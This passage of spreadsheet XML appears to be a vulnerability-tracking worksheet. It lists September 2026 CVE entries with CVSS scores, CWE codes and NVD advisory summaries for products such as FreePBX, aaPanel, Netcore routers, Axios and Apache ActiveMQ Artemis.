      <c r="O62" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P62" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q62" s="5" t="inlineStr"/>
      <c r="R62" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-94</t>
        </is>
      </c>
      <c r="S62" s="5" t="inlineStr">
        <is>
          <t>FreePBX is an open source IP PBX. Prior to versions 16.0.72 and 17.0.7, a critical vulnerability exists in the FreePBX backup Module that allows authenticated attackers to execute arbitrary code on the server. Authentication with a known username that has sufficient access permissions and/or write access to backup files is required. This vulnerability is caused by improper path sanitization in the backup restore functionality, enabling attackers to upload malicious PHP files to the web root directory. This issue has been patched in versions 16.0.72 and 17.0.7.</t>
        </is>
      </c>
      <c r="T62" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54708</t>
        </is>
      </c>
    </row>
    <row r="63">
      <c r="A63" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B63" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C63" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54710</t>
        </is>
      </c>
      <c r="D63" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E63" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F63" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G63" s="5" t="inlineStr"/>
      <c r="H63" s="5" t="inlineStr"/>
      <c r="I63" s="5" t="inlineStr"/>
      <c r="J63" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K63" s="5" t="inlineStr"/>
      <c r="L63" s="5" t="inlineStr"/>
      <c r="M63" s="5" t="inlineStr"/>
      <c r="N63" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O63" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P63" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q63" s="5" t="inlineStr"/>
      <c r="R63" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-94</t>
        </is>
      </c>
      <c r="S63" s="5" t="inlineStr">
        <is>
          <t>FreePBX is an open source IP PBX. Prior to versions 16.0.40 and 17.0.7, a critical remote code execution (RCE) vulnerability exists in the superfecta module due to unsafe inclusion of arbitrary PHP files, allowing authenticated attackers to execute arbitrary PHP code on the server with the privileges of the web server user. Authentication with a known username is required. The vulnerability is rooted in the options and save_options cases in the Superfecta module's AJAX handler. The code dynamically includes PHP files from the sources/ directory based on user-supplied input. This allows an attacker to execute arbitrary code when combined with arbitrary directory creation (e.g., via the backup module) and file uploads that reveal full paths (e.g., via the soundlang module). This issue has been patched in versions 16.0.40 and 17.0.7.</t>
        </is>
      </c>
      <c r="T63" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54710</t>
        </is>
      </c>
    </row>
    <row r="64">
      <c r="A64" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B64" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C64" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75600</t>
        </is>
      </c>
      <c r="D64" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E64" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F64" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G64" s="5" t="inlineStr"/>
      <c r="H64" s="5" t="inlineStr"/>
      <c r="I64" s="5" t="inlineStr"/>
      <c r="J64" s="5" t="inlineStr"/>
      <c r="K64" s="5" t="inlineStr"/>
      <c r="L64" s="5" t="inlineStr"/>
      <c r="M64" s="5" t="inlineStr"/>
      <c r="N64" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O64" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P64" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q64" s="5" t="inlineStr"/>
      <c r="R64" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S64" s="5" t="inlineStr">
        <is>
          <t>FreePBX is an open source IP PBX. Prior to version 17.0.9, authenticated users who are authorized to access the GraphQL api module interface of FreePBX are able to execute arbitrary shell commands. Authenticated access to the api module is required. The PBX API module's documentation generator accepts an authenticated host parameter and uses it to build a shell command. The code path validates the generated OAuth access token before execution, but it does not validate or escape host. Compromise results in authenticated arbitrary shell command execution as the FreePBX web/PBX service user (typically asterisk.). This issue has been patched in version 17.0.9.</t>
        </is>
      </c>
      <c r="T64" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75600</t>
        </is>
      </c>
    </row>
    <row r="65">
      <c r="A65" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B65" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C65" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86530</t>
        </is>
      </c>
      <c r="D65" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E65" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F65" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G65" s="5" t="inlineStr"/>
      <c r="H65" s="5" t="inlineStr"/>
      <c r="I65" s="5" t="inlineStr"/>
      <c r="J65" s="5" t="inlineStr"/>
      <c r="K65" s="5" t="inlineStr"/>
      <c r="L65" s="5" t="inlineStr"/>
      <c r="M65" s="5" t="inlineStr"/>
      <c r="N65" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O65" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P65" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q65" s="5" t="inlineStr"/>
      <c r="R65" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S65" s="5" t="inlineStr">
        <is>
          <t>BUFFALO Wi-Fi products handle some web form input improperly to assemble command line strings internally. An administrative user may send a crafted HTTP request and execute an arbitrary OS command.</t>
        </is>
      </c>
      <c r="T65" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86530</t>
        </is>
      </c>
    </row>
    <row r="66">
      <c r="A66" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B66" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C66" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87969</t>
        </is>
      </c>
      <c r="D66" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E66" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F66" s="5" t="inlineStr">
        <is>
          <t>5d1c2695-1a31-4499-88ae-e847036fd7e3</t>
        </is>
      </c>
      <c r="G66" s="5" t="inlineStr"/>
      <c r="H66" s="5" t="inlineStr"/>
      <c r="I66" s="5" t="inlineStr"/>
      <c r="J66" s="5" t="inlineStr"/>
      <c r="K66" s="5" t="inlineStr"/>
      <c r="L66" s="5" t="inlineStr"/>
      <c r="M66" s="5" t="inlineStr"/>
      <c r="N66" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O66" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P66" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q66" s="5" t="inlineStr"/>
      <c r="R66" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S66" s="5" t="inlineStr">
        <is>
          <t>An OS command injection vulnerability in the WatchGuard AP diagnostic CLI allows an authenticated administrator to execute arbitrary operating system commands by supplying crafted input.</t>
        </is>
      </c>
      <c r="T66" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87969</t>
        </is>
      </c>
    </row>
    <row r="67">
      <c r="A67" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B67" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C67" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100750</t>
        </is>
      </c>
      <c r="D67" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E67" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F67" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G67" s="5" t="inlineStr"/>
      <c r="H67" s="5" t="inlineStr"/>
      <c r="I67" s="5" t="inlineStr"/>
      <c r="J67" s="5" t="inlineStr"/>
      <c r="K67" s="5" t="inlineStr"/>
      <c r="L67" s="5" t="inlineStr"/>
      <c r="M67" s="5" t="inlineStr"/>
      <c r="N67" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O67" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P67" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q67" s="5" t="inlineStr"/>
      <c r="R67" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S67" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - regularlabs.com - LFI / SSRF in Modules Anywhere 1.5.0 - 9.0.5 for Joomla - Modules Anywhere Pro lets additional attributes on a module tag replace arbitrary parameters of the selected module. This feature is enabled by default in affected versions. The overrides are applied without checking who authored the content containing the tag. The security effect depends on how the selected module consumes the replaced parameter. Joomla's core Feed module provides a concrete affected path: its rssurl parameter is opened by the server and accepts local file: URLs as well as network URLs.</t>
        </is>
      </c>
      <c r="T67" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100750</t>
        </is>
      </c>
    </row>
    <row r="68">
      <c r="A68" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B68" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C68" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101007</t>
        </is>
      </c>
      <c r="D68" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E68" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F68" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G68" s="5" t="inlineStr"/>
      <c r="H68" s="5" t="inlineStr"/>
      <c r="I68" s="5" t="inlineStr"/>
      <c r="J68" s="5" t="inlineStr"/>
      <c r="K68" s="5" t="inlineStr"/>
      <c r="L68" s="5" t="inlineStr"/>
      <c r="M68" s="5" t="inlineStr"/>
      <c r="N68" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O68" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P68" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q68" s="5" t="inlineStr"/>
      <c r="R68" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="S68" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in aaPanel BaoTa up to 11.8.0. This issue affects the function InputSql of the file class/database.py of the component Database Backup Handler. Such manipulation of the argument Password leads to os command injection. The attack can be executed remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T68" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101007</t>
        </is>
      </c>
    </row>
    <row r="69">
      <c r="A69" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B69" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C69" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101008</t>
        </is>
      </c>
      <c r="D69" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E69" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F69" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G69" s="5" t="inlineStr"/>
      <c r="H69" s="5" t="inlineStr"/>
      <c r="I69" s="5" t="inlineStr"/>
      <c r="J69" s="5" t="inlineStr"/>
      <c r="K69" s="5" t="inlineStr"/>
      <c r="L69" s="5" t="inlineStr"/>
      <c r="M69" s="5" t="inlineStr"/>
      <c r="N69" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O69" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P69" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q69" s="5" t="inlineStr"/>
      <c r="R69" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-77</t>
        </is>
      </c>
      <c r="S69" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in aaPanel BaoTa up to 11.8.0. Impacted is the function merge_split_file of the file /www/server/panel/class/files.py of the component File Merge Handler. Performing a manipulation of the argument split_file_path results in command injection. The attack is possible to be carried out remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T69" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101008</t>
        </is>
      </c>
    </row>
    <row r="70">
      <c r="A70" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B70" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C70" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101009</t>
        </is>
      </c>
      <c r="D70" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E70" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F70" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G70" s="5" t="inlineStr"/>
      <c r="H70" s="5" t="inlineStr"/>
      <c r="I70" s="5" t="inlineStr"/>
      <c r="J70" s="5" t="inlineStr"/>
      <c r="K70" s="5" t="inlineStr"/>
      <c r="L70" s="5" t="inlineStr"/>
      <c r="M70" s="5" t="inlineStr"/>
      <c r="N70" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O70" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P70" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q70" s="5" t="inlineStr"/>
      <c r="R70" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="S70" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in aaPanel BaoTa up to 11.8.0. The affected element is the function panelTask.bt_task._unzip of the file /www/server/panel/class/panelTask.py of the component Unzip Handler. Executing a manipulation of the argument Password can lead to os command injection. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T70" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101009</t>
        </is>
      </c>
    </row>
    <row r="71">
      <c r="A71" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B71" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C71" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55157</t>
        </is>
      </c>
      <c r="D71" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E71" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F71" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G71" s="5" t="inlineStr"/>
      <c r="H71" s="5" t="inlineStr"/>
      <c r="I71" s="5" t="inlineStr"/>
      <c r="J71" s="5" t="inlineStr"/>
      <c r="K71" s="5" t="inlineStr"/>
      <c r="L71" s="5" t="inlineStr"/>
      <c r="M71" s="5" t="inlineStr"/>
      <c r="N71" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O71" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P71" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q71" s="5" t="inlineStr"/>
      <c r="R71" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S71" s="5" t="inlineStr">
        <is>
          <t>Token Optimizer MCP measures token savings per AI coding agent, optimizes context, and shares a live local knowledge graph across 16 CLI clients. Prior to version 5.1.0, token-optimizer-mcp is vulnerable to OS command injection in the smart_user tool. Any MCP client that can call the smart_user tool can execute arbitrary shell commands through the username argument of the get-user-info operation. The commands execute with the privileges of the user running the token-optimizer-mcp server. This issue has been patched in version 5.1.0.</t>
        </is>
      </c>
      <c r="T71" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55157</t>
        </is>
      </c>
    </row>
    <row r="72">
      <c r="A72" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B72" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C72" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101073</t>
        </is>
      </c>
      <c r="D72" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E72" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F72" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G72" s="5" t="inlineStr"/>
      <c r="H72" s="5" t="inlineStr"/>
      <c r="I72" s="5" t="inlineStr"/>
      <c r="J72" s="5" t="inlineStr"/>
      <c r="K72" s="5" t="inlineStr"/>
      <c r="L72" s="5" t="inlineStr"/>
      <c r="M72" s="5" t="inlineStr"/>
      <c r="N72" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O72" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P72" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q72" s="5" t="inlineStr"/>
      <c r="R72" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S72" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in Netcore NR289-GE 1.4.5102. Impacted is an unknown function of the file /bin/boa of the component CGI Dispatcher. Performing a manipulation results in improper authentication. The attack may be initiated remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T72" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101073</t>
        </is>
      </c>
    </row>
    <row r="73">
      <c r="A73" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B73" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C73" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101188</t>
        </is>
      </c>
      <c r="D73" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E73" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F73" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G73" s="5" t="inlineStr"/>
      <c r="H73" s="5" t="inlineStr"/>
      <c r="I73" s="5" t="inlineStr"/>
      <c r="J73" s="5" t="inlineStr"/>
      <c r="K73" s="5" t="inlineStr"/>
      <c r="L73" s="5" t="inlineStr"/>
      <c r="M73" s="5" t="inlineStr"/>
      <c r="N73" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O73" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P73" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q73" s="5" t="inlineStr"/>
      <c r="R73" s="5" t="inlineStr">
        <is>
          <t>CWE-640</t>
        </is>
      </c>
      <c r="S73" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in Netcore POWER13 2.0.240730.162638. This issue affects the function routerd.passwd_set of the file /ubus. Such manipulation leads to weak password recovery. The attack may be performed from remote. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T73" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101188</t>
        </is>
      </c>
    </row>
    <row r="74">
      <c r="A74" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B74" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C74" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101909</t>
        </is>
      </c>
      <c r="D74" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E74" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F74" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G74" s="5" t="inlineStr"/>
      <c r="H74" s="5" t="inlineStr"/>
      <c r="I74" s="5" t="inlineStr"/>
      <c r="J74" s="5" t="inlineStr">
        <is>
          <t>node.js, axios</t>
        </is>
      </c>
      <c r="K74" s="5" t="inlineStr"/>
      <c r="L74" s="5" t="inlineStr"/>
      <c r="M74" s="5" t="inlineStr"/>
      <c r="N74" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O74" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P74" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q74" s="5" t="inlineStr"/>
      <c r="R74" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="S74" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise-based HTTP client for the browser and Node.js. From 0.28.0 until 0.34.0 and 1.15.1 until 1.20.0, ToFormData processes inherited serialization options and visitor properties supplied through prototype pollution. A separate same-process prototype-pollution flaw supplies inherited dots, indexes, metaTokens, maxDepth, visitor, or Blob values before object serialization. The inherited options alter toFormData field naming and data interpretation, maxDepth can force request failure, Blob changes value handling, and a polluted visitor can execute when an attacker already has the stronger ability to inject a function. Serialized field naming and data interpretation can change, maxDepth can cause request failure, Blob can alter value handling, and a polluted visitor can execute under the stronger function-injection primitive. This issue is fixed in versions 0.34.0 and 1.20.0.</t>
        </is>
      </c>
      <c r="T74" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101909</t>
        </is>
      </c>
    </row>
    <row r="75">
      <c r="A75" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B75" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C75" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81375</t>
        </is>
      </c>
      <c r="D75" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E75" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F75" s="5" t="inlineStr">
        <is>
          <t>f45cbf4e-4146-4068-b7e1-655ffc2c548c</t>
        </is>
      </c>
      <c r="G75" s="5" t="inlineStr"/>
      <c r="H75" s="5" t="inlineStr"/>
      <c r="I75" s="5" t="inlineStr"/>
      <c r="J75" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K75" s="5" t="inlineStr"/>
      <c r="L75" s="5" t="inlineStr"/>
      <c r="M75" s="5" t="inlineStr"/>
      <c r="N75" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O75" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P75" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q75" s="5" t="inlineStr"/>
      <c r="R75" s="5" t="inlineStr">
        <is>
          <t>CWE-610</t>
        </is>
      </c>
      <c r="S75" s="5" t="inlineStr">
        <is>
          <t>A Confused Deputy vulnerability in the EmailTask component in Google Cloud Application Integration versions prior to 2026-06-30 on Google Cloud Platform allows an authenticated attacker to read and exfiltrate arbitrary Google-internal files via a crafted attachment file path.
This vulnerability was patched on 30 June 2026, and no customer action is needed.</t>
        </is>
      </c>
      <c r="T75" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81375</t>
        </is>
      </c>
    </row>
    <row r="76">
      <c r="A76" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B76" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C76" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101292</t>
        </is>
      </c>
      <c r="D76" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E76" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F76" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G76" s="5" t="inlineStr"/>
      <c r="H76" s="5" t="inlineStr"/>
      <c r="I76" s="5" t="inlineStr"/>
      <c r="J76" s="5" t="inlineStr"/>
      <c r="K76" s="5" t="inlineStr"/>
      <c r="L76" s="5" t="inlineStr"/>
      <c r="M76" s="5" t="inlineStr"/>
      <c r="N76" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O76" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P76" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q76" s="5" t="inlineStr"/>
      <c r="R76" s="5" t="inlineStr">
        <is>
          <t>CWE-470</t>
        </is>
      </c>
      <c r="S76" s="5" t="inlineStr">
        <is>
          <t>Apache ActiveMQ Artemis before 2.34.0 contains an unsafe reflection vulnerability in FederationStreamConnectMessage.getFederationPolicy(). The method calls Class.forName(clazz).getConstructor().newInstance() where clazz is read directly from the CORE protocol wire buffer without type validation. An authenticated federation peer can send a FEDERATION_DOWNSTREAM_CONNECT packet with a crafted class name, causing the broker to load and instantiate arbitrary classes visible to the Artemis module classloader. Static initializers (&lt;clinit&gt;) and no-argument constructors (&lt;init&gt;()) execute as side effects before the type cast, enabling denial of service via system-property poisoning, out-of-memory conditions via classloading, or broker state manipulation.</t>
        </is>
      </c>
      <c r="T76" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101292</t>
        </is>
      </c>
    </row>
    <row r="77">
      <c r="A77" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B77" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C77" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101901</t>
        </is>
      </c>
      <c r="D77" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E77" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F77" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G77" s="5" t="inlineStr"/>
      <c r="H77" s="5" t="inlineStr"/>
      <c r="I77" s="5" t="inlineStr"/>
      <c r="J77" s="5" t="inlineStr">
        <is>
          <t>node.js, axios</t>
        </is>
      </c>
      <c r="K77" s="5" t="inlineStr"/>
      <c r="L77" s="5" t="inlineStr"/>
      <c r="M77" s="5" t="inlineStr"/>
      <c r="N77" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O77" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P77" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q77" s="5" t="inlineStr"/>
      <c r="R77" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S77" s="5" t="inlineStr">
        <is>
